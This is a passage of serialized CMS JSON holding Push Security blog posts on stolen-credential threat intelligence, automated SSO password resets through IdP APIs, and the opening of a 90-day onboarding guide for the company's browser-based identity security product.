IBM",[155205],{"type":194},{},{"nodeType":173,"value":155208,"marks":155209,"data":155210}," identified a 71% year-over-year increase in cyberattacks using stolen or compromised credentials. This jump made stolen creds the No. 1 source of initial access for cyberattacks in their study. They also found a 266% uptick in the last year in the use of infostealers — malware designed to capture passwords, cookies, and other credential data.",[],{},{"nodeType":254,"data":155212,"content":155213},{},[155214],{"nodeType":178,"data":155215,"content":155216},{},[155217,155221,155230],{"nodeType":173,"value":155218,"marks":155219,"data":155220},"Researchers at threat intelligence provider ",[],{},{"nodeType":186,"data":155222,"content":155224},{"uri":155223},"https://go.recordedfuture.com/hubfs/reports/ta-2024-0321.pdf",[155225],{"nodeType":173,"value":155226,"marks":155227,"data":155229},"Recorded Future",[155228],{"type":194},{},{"nodeType":173,"value":155231,"marks":155232,"data":155233}," found a 135% increase last year in the number of harvested credentials among their data sources, and a 166% increase in credentials that included cookies, providing an easy way for attackers to bypass MFA protections.",[],{},{"nodeType":254,"data":155235,"content":155236},{},[155237],{"nodeType":178,"data":155238,"content":155239},{},[155240,155244,155253,155257,155266],{"nodeType":173,"value":155241,"marks":155242,"data":155243},"Meanwhile, Mandiant’s last two ",[],{},{"nodeType":186,"data":155245,"content":155247},{"uri":155246},"https://cloud.google.com/security/resources/m-trends",[155248],{"nodeType":173,"value":155249,"marks":155250,"data":155252},"M-Trends reports",[155251],{"type":194},{},{"nodeType":173,"value":155254,"marks":155255,"data":155256}," found that stolen creds were the third and fourth most-used initial intrusion method of the last two years. Cisco Talos researchers found that the ",[],{},{"nodeType":186,"data":155258,"content":155260},{"uri":155259},"https://blog.talosintelligence.com/cisco-talos-2023-year-in-review/",[155261],{"nodeType":173,"value":155262,"marks":155263,"data":155265},"use of valid accounts",[155264],{"type":194},{},{"nodeType":173,"value":155267,"marks":155268,"data":155269}," was the second-most common attack technique they observed last year.",[],{},{"nodeType":254,"data":155271,"content":155272},{},[155273],{"nodeType":178,"data":155274,"content":155275},{},[155276],{"nodeType":173,"value":155277,"marks":155278,"data":155279},"Push’s own review of the 25 most notable public identity-related breaches over the last year found that 23 were tied to stolen credentials.",[],{},{"nodeType":178,"data":155281,"content":155282},{},[155283],{"nodeType":173,"value":155284,"marks":155285,"data":155286},"What’s not immediately obvious from these statistics is that not only are credential-based attacks becoming more common, but they’re also becoming easier for attackers to execute.",[],{},{"nodeType":178,"data":155288,"content":155289},{},[155290,155293,155301],{"nodeType":173,"value":37,"marks":155291,"data":155292},[],{},{"nodeType":186,"data":155294,"content":155295},{"uri":155200},[155296],{"nodeType":173,"value":155297,"marks":155298,"data":155300},"IBM X-Force researchers",[155299],{"type":194},{},{"nodeType":173,"value":155302,"marks":155303,"data":155304}," have found that credentials for cloud accounts account for 90% of all cloud assets for sale on the dark web, making them readily accessible. Price tags can be as low as $10.",[],{},{"nodeType":235,"data":155306,"content":155307},{},[155308],{"nodeType":173,"value":155309,"marks":155310,"data":155311},"The rise of infostealers has supercharged the stolen credential marketplace",[],{},{"nodeType":178,"data":155313,"content":155314},{},[155315,155319,155327],{"nodeType":173,"value":155316,"marks":155317,"data":155318},"One category of threat — infostealer malware — has emerged as an especially successful avenue of compromise. While infostealers aren’t new, they have developed alongside what is now a robust economy for stolen credentials (think: dedicated Telegram channels advertising stolen data from the most popular infostealers), making them a fruitful option for attackers. For a deeper dive on the rise of infostealers, see our ",[],{},{"nodeType":186,"data":155320,"content":155321},{"uri":126102},[155322],{"nodeType":173,"value":155323,"marks":155324,"data":155326},"previous article",[155325],{"type":194},{},{"nodeType":173,"value":1477,"marks":155328,"data":155329},[],{},{"nodeType":178,"data":155331,"content":155332},{},[155333],{"nodeType":173,"value":155334,"marks":155335,"data":155336},"Once attackers gain possession of stolen creds, they have plenty of soft targets. For organizations with a large amount of SaaS — a percentage of which will always be unmanaged shadow IT or freemium — the risk is heightened because all attackers need to do is log in to potentially hundreds of services, dump the data they find (including additional creds in some cases), and profit. ",[],{},{"nodeType":178,"data":155338,"content":155339},{},[155340,155344,155353],{"nodeType":173,"value":155341,"marks":155342,"data":155343},"In other words, the average attack path for SaaS is shorter and occurs in-app, often using legitimate workflows, making it therefore harder to detect than traditional network exploits. We discuss this phenomenon in our ",[],{},{"nodeType":186,"data":155345,"content":155346},{"uri":81621},[155347],{"nodeType":173,"value":155348,"marks":155349,"data":155352},"shifting detection left",[155350,155351],{"type":194},{"type":370},{},{"nodeType":173,"value":155354,"marks":155355,"data":155356}," article.",[],{},{"nodeType":178,"data":155358,"content":155359},{},[155360],{"nodeType":173,"value":155361,"marks":155362,"data":155363},"Our take: We haven’t yet seen the peak of identity attacks that leverage compromised credentials. The opportunities for attackers are too numerous, and front-line defenses like MFA are still not widely enough enforced, particularly on unmanaged apps used for work.",[],{},{"nodeType":178,"data":155365,"content":155366},{},[155367,155371,155378],{"nodeType":173,"value":155368,"marks":155369,"data":155370},"Push Security’s ",[],{},{"nodeType":186,"data":155372,"content":155373},{"uri":4492},[155374],{"nodeType":173,"value":111468,"marks":155375,"data":155377},[155376],{"type":194},{},{"nodeType":173,"value":155379,"marks":155380,"data":155381}," has found that 37% of corporate identities are using passwords with no MFA. For attackers in possession of stolen creds, these are easy marks.",[],{},{"nodeType":231,"data":155383,"content":155384},{},[],{"nodeType":169,"data":155386,"content":155387},{},[155388],{"nodeType":173,"value":155389,"marks":155390,"data":155391},"How Push detects stolen creds with high confidence",[],{},{"nodeType":178,"data":155393,"content":155394},{},[155395],{"nodeType":173,"value":155396,"marks":155397,"data":155398},"Now let’s take a look at how Push’s approach to this problem is different.",[],{},{"nodeType":178,"data":155400,"content":155401},{},[155402],{"nodeType":173,"value":155403,"marks":155404,"data":155405},"If you’re not familiar with the Push platform, a bit of context will be useful here: Push uses a browser agent deployed to employee browsers (we support all major browsers) to prevent, detect, and block identity attacks. ",[],{},{"nodeType":178,"data":155407,"content":155408},{},[155409,155413,155422,155426,155434],{"nodeType":173,"value":155410,"marks":155411,"data":155412},"In addition to enforcing ",[],{},{"nodeType":186,"data":155414,"content":155416},{"uri":155415},"https://pushsecurity.com/blog/introducing-set-and-forget-controls-that-stop-real-world-identity-attacks/",[155417],{"nodeType":173,"value":155418,"marks":155419,"data":155421},"security controls",[155420],{"type":194},{},{"nodeType":173,"value":155423,"marks":155424,"data":155425}," in the browser, Push also assesses the strength of end-user passwords by ",[],{},{"nodeType":186,"data":155427,"content":155428},{"uri":111913},[155429],{"nodeType":173,"value":155430,"marks":155431,"data":155433},"creating and analyzing",[155432],{"type":194},{},{"nodeType":173,"value":155435,"marks":155436,"data":155437}," a truncated, salted SHA256 hash of the password for a given account. This is called a password fingerprint. These k-anonymized fingerprints are never seen by Push’s back-end and exist only in local browser extension storage.",[],{},{"nodeType":178,"data":155439,"content":155440},{},[155441],{"nodeType":173,"value":155442,"marks":155443,"data":155444},"This approach gives Push a directly observable source of truth for corporate credentials, and that data point turns out to be the key to flipping the script on how threat intelligence on stolen credentials is typically evaluated.",[],{},{"nodeType":178,"data":155446,"content":155447},{},[155448],{"nodeType":173,"value":155449,"marks":155450,"data":155451},"In the past, evaluating TI on stolen creds meant performing traditional intelligence assessments, such as confidence level based on factors like the intel source and whether the data was still current. Only after determining whether the information was high-confidence could you take action.",[],{},{"nodeType":178,"data":155453,"content":155454},{},[155455,155459,155466],{"nodeType":173,"value":155456,"marks":155457,"data":155458},"It’s worth noting, too, that the age of TI alone is not enough of an indicator to determine whether to take action. With the ",[],{},{"nodeType":186,"data":155460,"content":155461},{"uri":819},[155462],{"nodeType":173,"value":155463,"marks":155464,"data":155465},"Snowflake breach earlier this year",[],{},{"nodeType":173,"value":155467,"marks":155468,"data":155469},", we saw how even older credentials posed a threat of account takeover where these creds were still in use. In the case of Snowflake, the attacker used credentials sourced from historical infostealer campaigns, some dating as far back as 2020.",[],{},{"nodeType":312,"data":155471,"content":155475},{"target":155472},{"sys":155473},{"id":155474,"type":317,"linkType":318},"2lSZ7HbZfLmSFXneCnVJzY",[],{"nodeType":235,"data":155477,"content":155478},{},[155479],{"nodeType":173,"value":155480,"marks":155481,"data":155482},"Forget about time-consuming manual TI validation and get straight to the true positives",[],{},{"nodeType":178,"data":155484,"content":155485},{},[155486],{"nodeType":173,"value":155487,"marks":155488,"data":155489},"With Push, the platform now can analyze threat intelligence on stolen credentials and alert when there’s a validated match among current credentials in use in your environment. This method works regardless of the source of the data or its age. This method also finds the needles in the haystack — situations where threat intel flags a stolen credential on one app, but that credential is also in use on several other apps. ",[],{},{"nodeType":312,"data":155491,"content":155495},{"target":155492},{"sys":155493},{"id":155494,"type":317,"linkType":318},"7GSFasHfHb3UgpgF8pZ2N2",[],{"nodeType":178,"data":155497,"content":155498},{},[155499],{"nodeType":173,"value":100610,"marks":155500,"data":155501},[],{},{"nodeType":250,"data":155503,"content":155504},{},[155505,155525,155535,155545,155555],{"nodeType":254,"data":155506,"content":155507},{},[155508],{"nodeType":178,"data":155509,"content":155510},{},[155511,155515,155522],{"nodeType":173,"value":155512,"marks":155513,"data":155514},"Push receives TI on stolen credentials from vendor feeds. Use the feeds that Push supplies (at no additional cost for Push customers), or, additionally, bring your own TI by supplying stolen credential reports via the ",[],{},{"nodeType":186,"data":155516,"content":155518},{"uri":155517},"https://pushsecurity.redoc.ly/rest-v1#operation/post-controls-stolenCredentials",[155519],{"nodeType":173,"value":155030,"marks":155520,"data":155521},[],{},{"nodeType":173,"value":2340,"marks":155523,"data":155524},[],{},{"nodeType":254,"data":155526,"content":155527},{},[155528],{"nodeType":178,"data":155529,"content":155530},{},[155531],{"nodeType":173,"value":155532,"marks":155533,"data":155534},"For each customer environment, Push checks for customer domains in the data set.",[],{},{"nodeType":254,"data":155536,"content":155537},{},[155538],{"nodeType":178,"data":155539,"content":155540},{},[155541],{"nodeType":173,"value":155542,"marks":155543,"data":155544},"When suspected stolen creds for a customer environment are present, Push hashes and salts the passwords and then sends those fingerprints to the relevant browser agents for comparison. ",[],{},{"nodeType":254,"data":155546,"content":155547},{},[155548],{"nodeType":178,"data":155549,"content":155550},{},[155551],{"nodeType":173,"value":155552,"marks":155553,"data":155554},"If the stolen credential fingerprint matches a known credential fingerprint observed to be in use by the Push browser agent, the platform returns a validated true positive alert. Note that Push can alert on a validated true positive regardless of which platform the TI source indicated was the source of the stolen cred, allowing you to find those compromised credentials in use across any of your apps.",[],{},{"nodeType":254,"data":155556,"content":155557},{},[155558],{"nodeType":178,"data":155559,"content":155560},{},[155561],{"nodeType":173,"value":105070,"marks":155562,"data":155563},[],{},{"nodeType":178,"data":155565,"content":155566},{},[155567],{"nodeType":173,"value":155568,"marks":155569,"data":155570},"From there, security teams can take action to reset passwords, identify potentially compromised devices, or perform other investigations.",[],{},{"nodeType":178,"data":155572,"content":155573},{},[155574],{"nodeType":173,"value":155575,"marks":155576,"data":155577},"By comparing all possible matches to only those credentials that are still in use, Push eliminates time-consuming validation exercises. In essence, the provenance of the intel no longer matters; only the true positives do.",[],{},{"nodeType":235,"data":155579,"content":155580},{},[155581],{"nodeType":173,"value":155582,"marks":155583,"data":155584},"Bring your own TI",[],{},{"nodeType":178,"data":155586,"content":155587},{},[155588],{"nodeType":173,"value":155589,"marks":155590,"data":155591},"With verified stolen credential detection, you can also extract a lot more value from your existing threat intelligence feeds by sharing stolen creds reports with the Push platform via API. ",[],{},{"nodeType":178,"data":155593,"content":155594},{},[155595],{"nodeType":173,"value":155596,"marks":155597,"data":155598},"This allows Push to perform the same checks to compare the reports to observed password fingerprints and flag only the true positives — eliminating the time-consuming work of manual triage, investigation, and end-user follow-up for your security team.",[],{},{"nodeType":231,"data":155600,"content":155601},{},[],{"nodeType":169,"data":155603,"content":155604},{},[155605],{"nodeType":173,"value":155606,"marks":155607,"data":155608},"Try Push for yourself",[],{},{"nodeType":178,"data":155610,"content":155611},{},[155612,155616,155623],{"nodeType":173,"value":155613,"marks":155614,"data":155615},"The validated stolen credential detections feature is available at no additional cost for all Push customers. If you’d like to explore the platform yourself, ",[],{},{"nodeType":186,"data":155617,"content":155618},{"uri":473},[155619],{"nodeType":173,"value":71815,"marks":155620,"data":155622},[155621],{"type":194},{},{"nodeType":173,"value":197,"marks":155624,"data":155625},[],{},{"nodeType":312,"data":155627,"content":155630},{"target":155628},{"sys":155629},{"id":4766,"type":317,"linkType":318},[],{"nodeType":178,"data":155632,"content":155633},{},[155634],{"nodeType":173,"value":37,"marks":155635,"data":155636},[],{},"Push now compares user passwords with TI feeds to alert you when valid credentials are available on the clearweb and darkweb.","2024-12-03T00:00:00.000Z",{"items":155640},[155641,155643],{"sys":155642,"name":18399},{"id":18398},{"sys":155644,"name":509},{"id":508},{"items":155646},[155647],{"fullName":2908,"firstName":2909,"jobTitle":514,"profilePicture":155648},{"url":2911},{"__typename":1528,"sys":155650,"content":155652,"title":155968,"synopsis":155969,"hashTags":118,"publishedDate":155970,"slug":155971,"tagsCollection":155972,"authorsCollection":155978},{"id":155651},"75wcCkoZEKwEMl7zBmDMtT",{"json":155653},{"data":155654,"content":155655,"nodeType":165},{},[155656,155663,155670,155689,155707,155730,155737,155753,155760,155767,155774,155777,155784,155804,155822,155828,155847,155854,155861,155867,155874,155880,155913,155920,155939,155942,155949,155956,155962],{"data":155657,"content":155658,"nodeType":169},{},[155659],{"data":155660,"marks":155661,"value":155662,"nodeType":173},{},[],"Preventing credential attacks with automated password resets ",{"data":155664,"content":155665,"nodeType":178},{},[155666],{"data":155667,"marks":155668,"value":155669,"nodeType":173},{},[],"Preventing credential attacks is not an easy task, especially if you’re a member of the security team tasked with protecting some of your organization’s most valued assets: SSO identities.",{"data":155671,"content":155672,"nodeType":178},{},[155673,155677,155686],{"data":155674,"marks":155675,"value":155676,"nodeType":173},{},[],"IdP accounts such as a user’s Okta, Entra, or Google Workspace login are the most lucrative identities that an attacker can take over. By compromising an SSO identity, attackers not only gain access to the account itself, but also any downstream apps accessed via SSO – and the juicy data and functionality stored there. This was evidenced earlier this year when ",{"data":155678,"content":155680,"nodeType":186},{"uri":155679},"https://www.bleepingcomputer.com/news/security/okta-warns-of-unprecedented-credential-stuffing-attacks-on-customers/",[155681],{"data":155682,"marks":155683,"value":155685,"nodeType":173},{},[155684],{"type":194},"Okta users experienced unprecedented levels of credential stuffing attacks",{"data":155687,"marks":155688,"value":197,"nodeType":173},{},[],{"data":155690,"content":155691,"nodeType":178},{},[155692,155696,155704],{"data":155693,"marks":155694,"value":155695,"nodeType":173},{},[],"You might also be surprised to learn that even these most critical accounts have serious security gaps. For example, ",{"data":155697,"content":155698,"nodeType":186},{"uri":4492},[155699],{"data":155700,"marks":155701,"value":155703,"nodeType":173},{},[155702],{"type":194},"in a recent study we identified that",{"data":155705,"marks":155706,"value":39946,"nodeType":173},{},[],{"data":155708,"content":155709,"nodeType":250},{},[155710,155720],{"data":155711,"content":155712,"nodeType":254},{},[155713],{"data":155714,"content":155715,"nodeType":178},{},[155716],{"data":155717,"marks":155718,"value":155719,"nodeType":173},{},[],"1 in 5 IdP accounts does not have an MFA method set, leaving them exposed to single-factor compromises using stolen credentials.",{"data":155721,"content":155722,"nodeType":254},{},[155723],{"data":155724,"content":155725,"nodeType":178},{},[155726],{"data":155727,"marks":155728,"value":155729,"nodeType":173},{},[],"10% of IdP accounts share a password that is used to access other identities. (We’re not talking about the actual SSO process here – many users will use the same password as they do to log into their Okta or Entra as they do personal accounts such as shopping or food delivery. Yes, really.)  ",{"data":155731,"content":155732,"nodeType":178},{},[155733],{"data":155734,"marks":155735,"value":155736,"nodeType":173},{},[],"It’s a constant worry that your CFO’s Microsoft, Google, or Okta credentials are going to show up in the next big darkweb password dump. Ideally you’d want to prevent users from reusing passwords across multiple services. That’s why your information security policy is mandating password manager use, right?",{"data":155738,"content":155739,"nodeType":178},{},[155740,155744,155749],{"data":155741,"marks":155742,"value":155743,"nodeType":173},{},[],"No matter how many policies you have in place, ",{"data":155745,"marks":155746,"value":155748,"nodeType":173},{},[155747],{"type":194},"people will inevitably use the same passwords across multiple services",{"data":155750,"marks":155751,"value":155752,"nodeType":173},{},[],". But who can blame them? Having to remember multiple passwords is a drag, especially when they find they can’t log into their company’s password manager from their home computers… The next best thing is to just reuse your Entra or Okta password across all services, right?!",{"data":155754,"content":155755,"nodeType":178},{},[155756],{"data":155757,"marks":155758,"value":155759,"nodeType":173},{},[],"At Push we realize that mistakes happen. That's why it's important to look out for when critical credentials are entered into a dodgy ecommerce platform, or the next entry lands on haveibeenpwnd.com.",{"data":155761,"content":155762,"nodeType":178},{},[155763],{"data":155764,"marks":155765,"value":155766,"nodeType":173},{},[],"By quickly forcing a password change when an SSO password is reused or breached, we can minimize the chance of it being abused by attackers. ",{"data":155768,"content":155769,"nodeType":178},{},[155770],{"data":155771,"marks":155772,"value":155773,"nodeType":173},{},[],"But how will you know when a password is reused or compromised? ",{"data":155775,"content":155776,"nodeType":231},{},[],{"data":155778,"content":155779,"nodeType":169},{},[155780],{"data":155781,"marks":155782,"value":155783,"nodeType":173},{},[],"Using Push data to alert on password vulnerabilities ",{"data":155785,"content":155786,"nodeType":178},{},[155787,155791,155800],{"data":155788,"marks":155789,"value":155790,"nodeType":173},{},[],"Enter the Push browser extension. Push fingerprints passwords (",{"data":155792,"content":155794,"nodeType":186},{"uri":155793},"https://pushsecurity.com/help/how-does-the-push-browser-extension-securely-track-reused-passwords",[155795],{"data":155796,"marks":155797,"value":155799,"nodeType":173},{},[155798],{"type":194},"in a safe way",{"data":155801,"marks":155802,"value":155803,"nodeType":173},{},[],") as they are used by employees to access apps in their browsers. ",{"data":155805,"content":155806,"nodeType":178},{},[155807,155811,155819],{"data":155808,"marks":155809,"value":155810,"nodeType":173},{},[],"When a user logs into an app using credentials that they’ve previously used to login to another account, Push fires off an alert. ",{"data":155812,"content":155813,"nodeType":186},{"uri":62639},[155814],{"data":155815,"marks":155816,"value":155818,"nodeType":173},{},[155817],{"type":194},"We can also detect when an active password is stolen and appears on a criminal forum",{"data":155820,"marks":155821,"value":197,"nodeType":173},{},[],{"data":155823,"content":155827,"nodeType":312},{"target":155824},{"sys":155825},{"id":155826,"type":317,"linkType":318},"5He3FB0NT3D3lcbwiVtn02",[],{"data":155829,"content":155830,"nodeType":178},{},[155831,155835,155843],{"data":155832,"marks":155833,"value":155834,"nodeType":173},{},[],"If you’ve ",{"data":155836,"content":155837,"nodeType":186},{"uri":3751},[155838],{"data":155839,"marks":155840,"value":155842,"nodeType":173},{},[155841],{"type":194},"connected Push to your SIEM or SOAR",{"data":155844,"marks":155845,"value":155846,"nodeType":173},{},[],", you’ll be able to create a workflow to respond automatically. ",{"data":155848,"content":155849,"nodeType":235},{},[155850],{"data":155851,"marks":155852,"value":155853,"nodeType":173},{},[],"Automating password resets in your SIEM using Push webhooks",{"data":155855,"content":155856,"nodeType":178},{},[155857],{"data":155858,"marks":155859,"value":155860,"nodeType":173},{},[],"You can automate password resets for accounts by ingesting this information via webhook into a SIEM, generating an alert. This in turn can fire off another webhook or workflow that sets the ‘force password change on next logon’ attribute on the user’s account.",{"data":155862,"content":155866,"nodeType":312},{"target":155863},{"sys":155864},{"id":155865,"type":317,"linkType":318},"5WFLIVm4DWcuH7a6owQlR1",[],{"data":155868,"content":155869,"nodeType":178},{},[155870],{"data":155871,"marks":155872,"value":155873,"nodeType":173},{},[],"Below is some POC python code we use internally. This is specific to Google Workspace, but the general logic should apply to any IdP that allows you to perform these actions via API calls.",{"data":155875,"content":155879,"nodeType":312},{"target":155876},{"sys":155877},{"id":155878,"type":317,"linkType":318},"4YNirRo8BlRrgGKwwzXE8R",[],{"data":155881,"content":155882,"nodeType":178},{},[155883,155887,155896,155900,155909],{"data":155884,"marks":155885,"value":155886,"nodeType":173},{},[],"You can perform similar functions in Microsoft Entra ID by modifying the user's ",{"data":155888,"content":155890,"nodeType":186},{"uri":155889},"https://learn.microsoft.com/en-us/graph/api/user-update?view=graph-rest-1.0&tabs=http#:~:text=DisablePasswordExpiration%2C%20DisableStrongPassword.-,passwordProfile,-PasswordProfile",[155891],{"data":155892,"marks":155893,"value":155895,"nodeType":173},{},[155894],{"type":194},"passwordProfile",{"data":155897,"marks":155898,"value":155899,"nodeType":173},{},[]," attribute via Microsoft Graph API, or in Okta via the ",{"data":155901,"content":155903,"nodeType":186},{"uri":155902},"https://developer.okta.com/docs/api/openapi/okta-management/management/tag/UserCred/#tag/UserCred/operation/expirePassword",[155904],{"data":155905,"marks":155906,"value":155908,"nodeType":173},{},[155907],{"type":194},"expire_password",{"data":155910,"marks":155911,"value":155912,"nodeType":173},{},[]," API endpoint.",{"data":155914,"content":155915,"nodeType":178},{},[155916],{"data":155917,"marks":155918,"value":155919,"nodeType":173},{},[],"You aren’t limited to just IdP accounts either – any app with an API that provides this functionality can be configured for automated password resets using Push data. ",{"data":155921,"content":155922,"nodeType":178},{},[155923,155927,155935],{"data":155924,"marks":155925,"value":155926,"nodeType":173},{},[],"We also use SSO password data to ",{"data":155928,"content":155929,"nodeType":186},{"uri":9099},[155930],{"data":155931,"marks":155932,"value":155934,"nodeType":173},{},[155933],{"type":194},"prevent users from entering their SSO credentials into phishing sites",{"data":155936,"marks":155937,"value":155938,"nodeType":173},{},[],", providing strong anti-phishing protection that is extremely hard for attackers to bypass. ",{"data":155940,"content":155941,"nodeType":231},{},[],{"data":155943,"content":155944,"nodeType":169},{},[155945],{"data":155946,"marks":155947,"value":155948,"nodeType":173},{},[],"Preventing attackers from exploiting vulnerable credentials has never been easier",{"data":155950,"content":155951,"nodeType":178},{},[155952],{"data":155953,"marks":155954,"value":155955,"nodeType":173},{},[],"This is just one of the possible SecOps use cases that Push streamlines and levels up for security teams. To find out more about Push’s browser-based ITDR platform and our other great features, book a demo. ",{"data":155957,"content":155961,"nodeType":312},{"target":155958},{"sys":155959},{"id":155960,"type":317,"linkType":318},"11p9wnGrZHqp3XPpThHFk3",[],{"data":155963,"content":155964,"nodeType":178},{},[155965],{"data":155966,"marks":155967,"value":37,"nodeType":173},{},[],"Automating SSO password resets using Push","Using Push to automate password resets for your most critical identities when a password vulnerability is detected.","2024-12-13T00:00:00.000Z","automating-sso-password-resets-using-push",{"items":155973},[155974,155976],{"sys":155975,"name":26137},{"id":26136},{"sys":155977,"name":509},{"id":508},{"items":155979},[155980],{"fullName":155981,"firstName":155982,"jobTitle":155983,"profilePicture":155984},"Johann Scheepers","Johann","Senior Security Engineer",{"url":155985},"https://images.ctfassets.net/y1cdw1ablpvd/75IEOH93vR0hbvxuqTu1m3/f6222745ee6892ea07bc18727a5a5ae7/T016S22KZ96-U02LU3SKC2D-e1e755770536-512.png",{"__typename":1528,"sys":155987,"content":155989,"title":157480,"synopsis":157481,"hashTags":118,"publishedDate":157482,"slug":157483,"tagsCollection":157484,"authorsCollection":157488},{"id":155988},"3lWfiuAMsVecxVyEKiwV0c",{"json":155990},{"nodeType":165,"data":155991,"content":155992},{},[155993,156000,156007,156023,156029,156048,156055,156062,156065,156072,156079,156157,156164,156171,156178,156185,156192,156199,156213,156219,156299,156306,156313,156348,156355,156360,156367,156382,156492,156516,156522,156529,156545,156551,156554,156561,156568,156583,156590,156597,156604,156627,156648,156654,156661,156668,156675,156691,156697,156733,156739,156746,156774,156786,156793,156800,156807,156857,156864,156870,156877,156880,156887,156894,156901,156908,156961,156975,157025,157056,157063,157127,157133,157140,157193,157212,157219,157234,157272,157279,157286,157293,157319,157325,157328,157335,157342,157349,157461,157468,157474],{"nodeType":169,"data":155994,"content":155995},{},[155996],{"nodeType":173,"value":155997,"marks":155998,"data":155999},"The journey ahead",[],{},{"nodeType":178,"data":156001,"content":156002},{},[156003],{"nodeType":173,"value":156004,"marks":156005,"data":156006},"So you’ve chosen Push to accompany you on your identity security journey. Good choice! We’ve got (threat) hunting supplies and a sturdy raft. It’s risky to go alone, though, so take this map with you.",[],{},{"nodeType":178,"data":156008,"content":156009},{},[156010,156014,156019],{"nodeType":173,"value":156011,"marks":156012,"data":156013},"Inspired by the classic 1980s video game* ",[],{},{"nodeType":173,"value":156015,"marks":156016,"data":156018},"Oregon Trail",[156017],{"type":1646},{},{"nodeType":173,"value":156020,"marks":156021,"data":156022},", we’ve put together the following guide for intrepid security teams who are traveling across potentially unknown territory as they uncover their identity attack surface, including shadow identities and apps, and secure it against modern identity attacks.",[],{},{"nodeType":312,"data":156024,"content":156028},{"target":156025},{"sys":156026},{"id":156027,"type":317,"linkType":318},"3Ys8l6lqQcWOFX5O6QSulO",[],{"nodeType":178,"data":156030,"content":156031},{},[156032,156036,156044],{"nodeType":173,"value":156033,"marks":156034,"data":156035},"(*For Push fans outside the U.S., Oregon Trail followed a group of pioneers as they attempted to cross the continent in a covered wagon, avoiding wild animals and hunting for food along the way. The ",[],{},{"nodeType":186,"data":156037,"content":156039},{"uri":156038},"https://knowyourmeme.com/memes/subcultures/the-oregon-trail",[156040],{"nodeType":173,"value":156041,"marks":156042,"data":156043},"memes",[],{},{"nodeType":173,"value":156045,"marks":156046,"data":156047}," now outlive the game, but we remember it fondly.)",[],{},{"nodeType":178,"data":156049,"content":156050},{},[156051],{"nodeType":173,"value":156052,"marks":156053,"data":156054},"In this guide, we’ll provide advice on what you can accomplish in your first three months after deploying Push to your workforce, transforming your employees’ browsers into a reliable control point to enforce a strong identity posture and stop account takeover.",[],{},{"nodeType":178,"data":156056,"content":156057},{},[156058],{"nodeType":173,"value":156059,"marks":156060,"data":156061},"In your first 90 days using Push, you can go far. Let’s take a look.",[],{},{"nodeType":231,"data":156063,"content":156064},{},[],{"nodeType":169,"data":156066,"content":156067},{},[156068],{"nodeType":173,"value":156069,"marks":156070,"data":156071},"First 30 days: Get intel and secure against bears",[],{},{"nodeType":178,"data":156073,"content":156074},{},[156075],{"nodeType":173,"value":156076,"marks":156077,"data":156078},"This guide assumes you’ve identified a few identity security goals already. These probably include things like:",[],{},{"nodeType":250,"data":156080,"content":156081},{},[156082,156104,156127,156137,156147],{"nodeType":254,"data":156083,"content":156084},{},[156085],{"nodeType":178,"data":156086,"content":156087},{},[156088,156092,156101],{"nodeType":173,"value":156089,"marks":156090,"data":156091},"Closing gaps in existing security controls to protect against MFA bypass attacks like Adversary-in-the-Middle ",[],{},{"nodeType":1698,"data":156093,"content":156096},{"target":156094},{"sys":156095},{"id":139982,"type":317,"linkType":318},[156097],{"nodeType":173,"value":156098,"marks":156099,"data":156100},"(AiTM) phishing toolkits",[],{},{"nodeType":173,"value":1477,"marks":156102,"data":156103},[],{},{"nodeType":254,"data":156105,"content":156106},{},[156107],{"nodeType":178,"data":156108,"content":156109},{},[156110,156114,156123],{"nodeType":173,"value":156111,"marks":156112,"data":156113},"Increasing ",[],{},{"nodeType":1698,"data":156115,"content":156118},{"target":156116},{"sys":156117},{"id":74493,"type":317,"linkType":318},[156119],{"nodeType":173,"value":156120,"marks":156121,"data":156122},"visibility of user activity",[],{},{"nodeType":173,"value":156124,"marks":156125,"data":156126}," in the browser to identify and respond to threats.",[],{},{"nodeType":254,"data":156128,"content":156129},{},[156130],{"nodeType":178,"data":156131,"content":156132},{},[156133],{"nodeType":173,"value":156134,"marks":156135,"data":156136},"Using federated SSO-based logins over password-based logins to limit the number of identities created, and removing unused login methods.",[],{},{"nodeType":254,"data":156138,"content":156139},{},[156140],{"nodeType":178,"data":156141,"content":156142},{},[156143],{"nodeType":173,"value":156144,"marks":156145,"data":156146},"Implementing phishing-resistant authentication methods, and removing phishable ones.",[],{},{"nodeType":254,"data":156148,"content":156149},{},[156150],{"nodeType":178,"data":156151,"content":156152},{},[156153],{"nodeType":173,"value":156154,"marks":156155,"data":156156},"Where password use cannot be avoided, ensuring good hygiene (no weak, reused, or breached passwords) and phishing-resistant MFA factors.",[],{},{"nodeType":178,"data":156158,"content":156159},{},[156160],{"nodeType":173,"value":156161,"marks":156162,"data":156163},"Then, once you’ve deployed the Push browser extension to your browser ecosystem, invited your security team to the Push admin console, and begun collecting behavioral and identity posture data from your employees’ login activity, you’re ready to embark.",[],{},{"nodeType":178,"data":156165,"content":156166},{},[156167],{"nodeType":173,"value":156168,"marks":156169,"data":156170},"Right away, you can set up your first out-of-the-box security control to provide novel and effective protection against adversary-in-the-middle (AiTM) phishing toolkits such as Evilginx, EvilNoVNC, and others.",[],{},{"nodeType":178,"data":156172,"content":156173},{},[156174],{"nodeType":173,"value":156175,"marks":156176,"data":156177},"It’s the identity security equivalent of bear deterrent (something sadly lacking on the Oregon Trail), and it takes just a couple of minutes.",[],{},{"nodeType":178,"data":156179,"content":156180},{},[156181],{"nodeType":173,"value":156182,"marks":156183,"data":156184},"You can also set additional security controls in Monitor mode and begin collecting valuable insights from your users’ account and app activity.",[],{},{"nodeType":178,"data":156186,"content":156187},{},[156188],{"nodeType":173,"value":156189,"marks":156190,"data":156191},"Here’s what we recommend for your first 30 days using Push:",[],{},{"nodeType":235,"data":156193,"content":156194},{},[156195],{"nodeType":173,"value":156196,"marks":156197,"data":156198},"Enable phishing tool detection in Warn or Block mode",[],{},{"nodeType":178,"data":156200,"content":156201},{},[156202,156206,156210],{"nodeType":173,"value":156203,"marks":156204,"data":156205},"Begin protecting employees from adversary-in-the-middle phishing from AitM tools by enabling 